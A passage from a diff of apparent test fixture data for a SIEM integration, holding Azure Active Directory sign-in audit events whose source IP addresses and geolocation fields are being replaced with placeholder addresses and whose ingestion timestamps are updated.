"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"e48d4214-364e-4731-b2b6-47dabf529218\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"ac8fcffb-7c44-498d-ad6b-24b85a3a1b59\",\"InterSystemsId\":\"9e0a494b-0db0-4481-a70e-eea6124b7018\",\"IntraSystemId\":\"e7a84bcf-41ff-4953-8e99-fb1820685f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000004-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000004-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970318100Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"e48d4214-364e-4731-b2b6-47dabf529218\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"ac8fcffb-7c44-498d-ad6b-24b85a3a1b59\",\"InterSystemsId\":\"9e0a494b-0db0-4481-a70e-eea6124b7018\",\"IntraSystemId\":\"e7a84bcf-41ff-4953-8e99-fb1820685f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000004-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000004-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -6683,25 +5810,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -6715,7 +5824,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -6765,7 +5874,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -6777,12 +5886,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051683700Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:36\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"880fb7bc-5708-42d1-86a8-760c32ac5e6b\",\"InterSystemsId\":\"9fc4af4c-bf19-4f88-92ac-0fd029ca21bd\",\"IntraSystemId\":\"56fa424b-64bd-4ea5-abc4-38256f8a5600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970322400Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:36\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"880fb7bc-5708-42d1-86a8-760c32ac5e6b\",\"InterSystemsId\":\"9fc4af4c-bf19-4f88-92ac-0fd029ca21bd\",\"IntraSystemId\":\"56fa424b-64bd-4ea5-abc4-38256f8a5600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -6821,25 +5930,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6853,7 +5944,7 @@ "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -6903,7 +5994,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -6915,12 +6006,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051686600Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"30c7afcc-f74d-4b5a-898e-ce72da9386b8\",\"InterSystemsId\":\"a35e980b-88be-4343-9691-629473e01983\",\"IntraSystemId\":\"78a2aa65-5026-4124-970a-00e06dc7df00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970327900Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"30c7afcc-f74d-4b5a-898e-ce72da9386b8\",\"InterSystemsId\":\"a35e980b-88be-4343-9691-629473e01983\",\"IntraSystemId\":\"78a2aa65-5026-4124-970a-00e06dc7df00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -6959,25 +6050,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -6991,7 +6064,7 @@ "ObjectId": "00000002-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Success", @@ -7041,7 +6114,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -7053,12 +6126,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051690300Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-06T09:28:00\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"d4f90f07-f5c4-4b36-a81c-6c9bae8660d6\",\"InterSystemsId\":\"a89e9b3b-b394-4ecf-8abc-a3f6aaf9237f\",\"IntraSystemId\":\"bfe22fb6-c763-4972-91a7-5b13d3d51400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970332800Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-06T09:28:00\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"d4f90f07-f5c4-4b36-a81c-6c9bae8660d6\",\"InterSystemsId\":\"a89e9b3b-b394-4ecf-8abc-a3f6aaf9237f\",\"IntraSystemId\":\"bfe22fb6-c763-4972-91a7-5b13d3d51400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -7097,25 +6170,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -7129,7 +6184,7 @@ "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -7179,7 +6234,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -7191,12 +6246,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051693700Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:28:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d2ad235b-d73f-4bd8-8aef-6e4909ee1b7c\",\"InterSystemsId\":\"aca3d9a3-792d-4357-87c6-ef50c3215baa\",\"IntraSystemId\":\"f67a1615-4606-4673-b6fb-68f714fa2200\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970338400Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:28:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d2ad235b-d73f-4bd8-8aef-6e4909ee1b7c\",\"InterSystemsId\":\"aca3d9a3-792d-4357-87c6-ef50c3215baa\",\"IntraSystemId\":\"f67a1615-4606-4673-b6fb-68f714fa2200\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -7235,25 +6290,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -7267,7 +6304,7 @@ "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -7317,7 +6354,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -7329,12 +6366,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051696500Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8ff18278-32ca-49d1-8658-91e577e0854f\",\"InterSystemsId\":\"ae211253-88cf-4921-9014-2f9beab64fb0\",\"IntraSystemId\":\"ccfec0f3-498b-43b1-a4c0-fb42f0fb5300\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970344Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 